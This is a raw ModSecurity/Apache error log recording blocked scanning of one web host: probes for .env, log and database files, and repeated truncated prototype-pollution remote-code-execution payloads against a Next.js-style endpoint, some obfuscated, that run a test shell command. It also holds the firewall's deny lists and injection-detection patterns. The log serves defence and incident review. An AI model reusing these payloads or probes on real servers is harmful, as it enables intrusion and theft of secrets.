"OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/dev.log"] [unique_id "aTPzuusuS7TwaJcc3vHz7QAAAMU"] [Sat Dec 06 11:13:30.998131 2025] [:error] [pid 28201:tid 28229] [client 16.146.2.134:47820] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/prod.log"] [unique_id "aTPzugaaBQA8K9Y2IUPb9QAAABc"] [Sat Dec 06 11:13:31.611369 2025] [:error] [pid 28201:tid 28224] [client 16.146.2.134:47826] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/Thumbs.db"] [unique_id "aTPzuwaaBQA8K9Y2IUPb9gAAABI"] [Wed Dec 10 00:20:26.726963 2025] [:error] [pid 10047:tid 10071] [client 45.148.10.23:22202] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aTigqm-neFT78GCR9wgI1wAAANU"] [Wed Dec 10 00:20:26.937629 2025] [:error] [pid 8901:tid 8998] [client 45.148.10.23:22218] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aTigqoPZrqwqhQFTx1EvjQAAAIE"] [Wed Dec 10 00:20:26.985050 2025] [:error] [pid 12415:tid 12441] [client 45.148.10.23:22222] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aTigqiehfogz7atDeBBh6gAAAQo"] [Wed Dec 10 00:20:27.028145 2025] [:error] [pid 12415:tid 12447] [client 45.148.10.23:22226] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/laravel.log"] [unique_id "aTigqyehfogz7atDeBBh6wAAARA"] [Wed Dec 10 00:20:27.068715 2025] [:error] [pid 12415:tid 12448] [client 45.148.10.23:22228] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aTigqyehfogz7atDeBBh7AAAARE"] [Wed Dec 10 00:20:27.109780 2025] [:error] [pid 8901:tid 9029] [client 45.148.10.23:22238] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTigq4PZrqwqhQFTx1EvjgAAAJE"] [Wed Dec 10 00:20:27.164564 2025] [:error] [pid 8901:tid 9002] [client 45.148.10.23:22240] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aTigq4PZrqwqhQFTx1EvjwAAAIM"] [Wed Dec 10 01:38:35.847359 2025] [:error] [pid 8900:tid 8993] [client 43.207.175.198:48588] [client 43.207.175.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aTiy-4fTNommSAYzc_YuWgAAAEc"] [Wed Dec 10 03:58:29.030060 2025] [:error] [pid 3655:tid 3659] [client 44.222.79.145:42906] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/.env"] [unique_id "aTjTxaNexQYgxDKgoqtRegAAAMI"] [Wed Dec 10 12:22:42.705465 2025] [:error] [pid 8150:tid 8179] [client 172.190.142.176:39276] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Dec 11 04:18:14.373716 2025] [:error] [pid 5581:tid 5607] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpAAAANg"] [Thu Dec 11 04:18:14.468810 2025] [:error] [pid 5581:tid 5588] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/app/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpQAAAMU"] [Thu Dec 11 04:18:14.559648 2025] [:error] [pid 5581:tid 5592] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/config/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpwAAAMk"] [Thu Dec 11 04:18:14.660813 2025] [:error] [pid 5581:tid 5589] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/api/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqAAAAMY"] [Thu Dec 11 04:18:14.755790 2025] [:error] [pid 5581:tid 5604] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/admin/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqQAAANU"] [Thu Dec 11 04:18:14.844436 2025] [:error] [pid 5581:tid 5603] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/backend/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqgAAANQ"] [Thu Dec 11 04:18:14.935305 2025] [:error] [pid 5581:tid 5593] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/frontend/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqwAAAMo"] [Thu Dec 11 14:58:49.506154 2025] [:error] [pid 5424:tid 5502] [client 130.33.46.121:8168] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Dec 11 15:00:22.499262 2025] [:error] [pid 5429:tid 5531] [client 130.33.46.121:14274] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Fri Dec 12 00:28:16.833475 2025] [:error] [pid 5424:tid 5502] [client 46.101.119.189:41072] [client 46.101.119.189] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: )() | found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[string.fromcharcode(109,97,105,110,77,111,100,117,108,101)][string.fromcharcode(114,101,113,117,105,114,101)]; } catch(e) {} if (!req) { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [ [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aTtFgCXyTIYstocRFEFbYwAAAEk"] [Tue Dec 16 16:53:33.968708 2025] [:error] [pid 23733:tid 23777] [client 18.175.53.42:39794] [client 18.175.53.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aUFybfszPqr_jbGu4RjzXAAAAsM"] [Tue Dec 16 18:34:11.921971 2025] [:error] [pid 16797:tid 16865] [client 3.127.242.241:33266] [client 3.127.242.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aUGKA4wdxKC99oXxvA8ZfQAAAow"] [Fri Dec 19 07:01:59.452063 2025] [:error] [pid 10837:tid 10857] [client 164.90.183.185:5220] [client 164.90.183.185] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: )() | found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[string.fromcharcode(109,97,105,110,77,111,100,117,108,101)][string.fromcharcode(114,101,113,117,105,114,101)..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [ [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aUTcR23ie3knXw3FZp5UKwAAANI"] [Sun Dec 21 10:01:11.016801 2025] [:error] [pid 2592:tid 2606] [client 139.59.133.87:26352] [client 139.59.133.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: )() | found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[string.fromcharcode(109,97,105,110,77,111,100,117,108,101)][string.fromcharcode(114,101,113,117,105,114,101)..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [ [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aUepRtBPR4UQWKfYLa8koAAAAMw"] [Wed Dec 24 08:54:25.176243 2025] [:error] [pid 3222:tid 3244] [client 4.217.183.253:43531] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Dec 27 07:50:13.705687 2025] [:error] [pid 6397:tid 6472] [client 13.214.210.12:50712] [client 13.214.210.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aU9zlbVQSsbzOWeYNjE4JgAAANE"] [Fri Jan 02 02:22:03.137541 2026] [:error] [pid 23874:tid 23894] [client 157.230.113.249:36696] [client 